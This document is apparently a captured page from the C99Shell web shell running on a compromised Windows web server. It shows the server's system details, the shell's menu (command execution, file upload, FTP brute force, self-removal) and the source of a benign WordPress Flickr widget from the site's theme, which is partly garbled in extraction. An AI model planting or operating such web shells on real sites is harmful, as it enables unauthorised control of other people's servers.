!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\themes\patti\framework\widgets\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     widget-flickr.php (3.38 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/******************************************
/* Flickr Widget
******************************************/
class dt_flickr extends WP_Widget {
                            
    
/** constructor */
    
function dt_flickr() {
        
parent::WP_Widget(false$name 'Patti - Flickr');
    }

    
/** @see WP_Widget::widget */
    
function widget($args$instance) {        
        
extract$args );
        
$title apply_filters('widget_title'$instance['title']);
        
$number = (int) strip_tags($instance['number']);
          
$id strip_tags($instance['id']);
          
$tags strip_tags($instance['tags']);
        
        
wp_enqueue_script('dt-jflickrfeed');
        
wp_enqueue_script('dt-custom-flickr');    
        
wp_localize_script'dt-custom-flickr''dt_flickr', array( 'id' => $id'tags' => $tags'number' => $number) );        
            
            echo 
$before_widget;
                if ( 
$title )
                    echo 
$before_title $title $after_title?>
                            <div id="flickr"></div>
            <?php echo $after_widget;
    }

    
/** @see WP_Widget::update */
    
function update($new_instance$old_instance) {                
    
$instance $old_instance;
    
$instance['title'] = strip_tags($new_instance['title']);
    
$instance['number'] = (int) strip_tags($new_instance['number']);
    
$instance['id'] = strip_tags($new_instance['id']);
    
$instance['tags'] = strip_tags($new_instance['tags']);
        return 
$instance;
    }

    
/** @see WP_Widget::form */
    
function form($instance) {
        
$instance wp_parse_args( (array) $instance, array( 'title' => 'Flickr Feed''number'=> 10'id' => '58842866@N08''tags' => 'architecture'));            
        
$title esc_attr($instance['title']);
        
$number = (int) strip_tags($instance['number']);
          
$id strip_tags($instance['id']);
          
$tags strip_tags($instance['tags']);
        
?>
         <p>
          <label for="<?php echo $this->get_field_id('title'); ?>"><?php _e('Title:''delicious'); ?></label> 
          <input class="widefat" id="<?php echo $this->get_field_id('title'); ?>" name="<?php echo $this->get_field_name('title'); ?>" type="text" value="<?php echo $title?>" />
        </p>
        <p>
          <label for="<?php echo $this->get_field_id('number'); ?>"><?php _e('Number of Pics to Show:''delicious'); ?></label> 
          <input class="widefat" id="<?php echo $this->get_field_id('number'); ?>" name="<?php echo $this->get_field_name('number'); ?>" type="text" value="<?php echo $number?>" />
        </p>
        <p>
          <label for="<?php echo $this->get_field_id('id'); ?>"><?php _e('Your Flickr ID:''delicious'); ?></label> 
          <input class="widefat" id="<?php echo $this->get_field_id('id'); ?>" name="<?php echo $this->get_field_name('id'); ?>" type="text" value="<?php echo $id?>" />
        </p>
        <p>To find out which is your flickr ID, check out <a target="_blank" href="http://idgettr.com/">idgettr.com</a></p>        
        <p>
          <label for="<?php echo $this->get_field_id('tags'); ?>"><?php _e('Optional - Display only pictures under a tag(name a tag):''delicious'); ?></label> 
          <input class="widefat" id="<?php echo $this->get_field_id('tags'); ?>" name="<?php echo $this->get_field_name('tags'); ?>" type="text" value="<?php echo $tags?>" />
        </p>        
        
        <?php 
    
}

// class dt_flickr
// register Flickr Feed Widget
add_action('widgets_init'create_function('''return register_widget("dt_flickr");'));    
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--